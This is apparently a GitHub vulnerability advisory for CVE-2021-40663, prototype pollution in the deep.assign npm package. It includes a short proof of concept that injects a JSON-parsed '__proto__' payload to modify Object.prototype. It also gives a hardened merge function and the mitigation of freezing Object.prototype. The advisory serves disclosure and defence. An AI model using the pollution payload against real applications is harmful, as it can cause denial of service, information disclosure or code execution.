CVE-2021-40663: Prototype Pollution in deep.assign npm package · Issue #1 · janbialostok/deep-assign
deep.assign npm package 0.0.0-alpha.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes (‘Prototype Pollution’).
✍️ Description
The deep.assign npm package is vulnerable to prototype pollution prior to version 0.0.0-alpha.0: keys from an untrusted source object, including a JSON-parsed `__proto__` key, are merged recursively into the target and end up on `Object.prototype`.
```javascript
// Proof of concept from the report. The require target was mangled by the
// page's e-mail obfuscation; the package name is "deep.assign".
var deepAssign = require("deep.assign")

// JSON.parse creates an OWN enumerable property literally named "__proto__",
// which the recursive merge then walks into.
var obj = JSON.parse('{"__proto__":{"polluted":1}}')
var obj1 = {"red":"apple"}

console.log("Before:" + {}.polluted)   // undefined
var c = deepAssign.deepAssign(obj1, obj)
console.log("After:" + {}.polluted)    // 1 on a vulnerable version: Object.prototype was modified
```
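For contrast, here is a hardened deep-assign written for this page as an added example; it is not the deep.assign package's code. It drops the `__proto__`, `constructor` and `prototype` keys, only recurses into own plain-object properties of the target, and `demo()` replays the report's payload shape (constructed input) to show that `Object.prototype` stays clean.

```javascript
// Keys that let a merged payload reach Object.prototype (or a class prototype
// via obj.constructor.prototype). A safe merge must never recurse on them.
const UNSAFE_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function isPlainObject(v) {
  return v !== null && typeof v === "object" && !Array.isArray(v);
}

function safeDeepAssign(target, ...sources) {
  for (const source of sources) {
    if (!isPlainObject(source)) continue;
    // Object.keys returns own enumerable keys only, but a JSON-parsed
    // "__proto__" IS an own enumerable key, so filtering is still required.
    for (const key of Object.keys(source)) {
      if (UNSAFE_KEYS.has(key)) continue; // silently drop the dangerous key
      const value = source[key];
      if (isPlainObject(value)) {
        // Recurse only into an OWN plain object on the target; never into an
        // inherited property such as target.constructor.
        const existing =
          Object.prototype.hasOwnProperty.call(target, key) && isPlainObject(target[key])
            ? target[key]
            : {};
        target[key] = safeDeepAssign(existing, value);
      } else {
        target[key] = value;
      }
    }
  }
  return target;
}

// Replays the advisory's payload shape (constructed sample input) and reports
// whether a fresh object picked up the injected property.
function demo() {
  const payload = JSON.parse('{"__proto__":{"polluted":1},"red":"apple"}');
  const merged = safeDeepAssign({ green: "pear" }, payload);
  return { merged, polluted: {}.polluted };
}
```

A complementary runtime mitigation is `Object.freeze(Object.prototype)` at process start, which turns any surviving pollution attempt into a silent no-op (or a TypeError in strict mode) rather than a global change.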
💥 Impact
May lead to Information Disclosure/DoS/RCE.
Related news
GHSA-3829-mgmw-jcg4: Prototype Pollution in deep.assign